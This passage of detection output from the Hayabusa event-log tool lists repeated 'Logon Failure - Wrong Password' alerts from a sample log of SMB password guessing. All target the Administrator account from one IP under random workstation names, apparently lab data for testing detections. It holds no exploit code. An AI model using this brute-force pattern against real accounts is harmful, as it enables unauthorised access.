NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:58.288 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: tITW0ihpErFk3nKp : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:58.344 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MdQqr1T4frPNlulf : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:58.385 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: niiXRpP5AVHpG9Hu : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:58.432 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: EThR98jZUdwNxbXQ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:58.465 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: NBsJcIw859FfEkLD : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:58.502 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: kG4Tv5vauSWhbj8F : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:58.543 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 453tjgRGMu46vC33 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:50:58.580 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 1fnzhhfszxJWxLCT : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:58.608 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: dWPkeL8TnAbC1nSV : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:58.659 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: JrDmUzyK4Xxx6Jn1 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:58.704 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: bMTf9D2yjumfS9LM : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:58.787 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 8cCs65ithseTCORa : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:58.823 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QBrGAScjpAdScGmJ : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:58.864 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: n90F99qBpmUUVLId : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:58.912 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MLeOkIG0hVHIOnN7 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:58.956 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: vVx5uUtkaFIf7PWZ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:58.993 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: kgd7lCQUQ3dHN18S : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:59.032 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: b8m2MmpFVK9Uojp7 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:50:59.071 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: F0NZjeu3lb5xddVQ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:59.112 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: YjjXBZnyWt0ljzpv : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:59.148 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: sinFBozyUR0sBadM : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:59.184 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Au22Y0LIuvTmZDpy : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:59.220 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QDWW3VfZ7rKayV2v : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:59.264 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: zPgaFDZtc5wEupnq : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:59.363 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: TpYZc2TTDfJFnPHo : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:59.434 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: rYKkl1iHImW9NwKv : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:59.489 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: KxA2dh1iUMaMWOkA : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:59.542 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: sCzEzW8jDZGGZcpd : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:59.589 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: p8510u5OsCVd94I5 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:50:59.628 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 2a0whHngnv7o1Bz2 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:59.668 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Xy6cGuYgubjlXoMw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:59.708 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: luoXLN2XZQC0lHfu : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:59.745 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 8jdKLW96haKCHHXI : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:59.792 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 9SQSH6E1aKXu1o7T : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:59.825 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: nOUdKa838wK1mLFw : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:59.860 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: aFmILxspIJsiEHwL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:59.912 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: pCz7qbdSEyqxQSKm : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:59.960 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Ny3F1xPgakJK0CA7 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:00.001 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Vi7Moaa6d12CzWhl : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:00.048 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 4fbbRVOig9bn9p5g : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:51:00.079 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: qSZrfRe9d0LLkbmA : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:00.116 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QqdZMYsbXFlrKFxk : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:00.152 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: kypdxj88trEUBEny : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:00.184 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 9hM8fge1IrNsJNd2 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:00.228 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: SzG27JSj6iAFyiNT : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:00.269 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: hWcjuW8dU5ATLHzB : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:00.304 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ns9lm9Nvhvi4fY6A : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:00.353 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: aExdYPqY2eUCYZmC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:00.389 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: t9cnmRGdByuJlKZj : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:00.432 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: f9RvWTFFUgCrhlkD : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:00.480 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: HC3oQUIEWqztyx6s : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:51:00.524 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: TK3BOeD2w9xPB4N1 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:00.560 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: I6yzU5WuvpmPKLSS : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:00.600 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: GFoUGsara5Pl03WP : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:00.634 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: qLaOCImeMIMlGvMj : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:00.761 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 2Vzb3pEI2ZeP2NFA : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:00.821 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 7Fa7ebH7UXd1KW4X : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:00.869 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: wRBHXRkOa6x5KI5G : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:00.915 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: VNVxzgOLrZzfP3cB : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:00.944 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: yCNXajRX2lIgLQuc : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:00.992 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: x0nukf24IoalycOn : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:01.101 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: xZFZN0KfeHtyDppG : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:51:01.144 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ZmxqKyWU5GU1y22P : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:01.184 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: WuRyvCfgQ4rwG3fu : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:01.220 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 3prKZt5ymouwNKnK : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:01.264 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: CWrNNn13EC1FLwLA : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:01.308 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: SfnBT5OvT5cQXHfS : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:01.344 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: RLZFPCShXoPvvThS : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:01.388 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: UsPCJ0UlfH4urYrm : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:01.424 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MIQlOetFByLZqPkT : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:01.456 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: c9IBZ0qTDlHWADZt : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:01.491 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: lmhkB39gKvvuT89e : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:01.536 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 4KPoZ8JB7WSjUCHW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
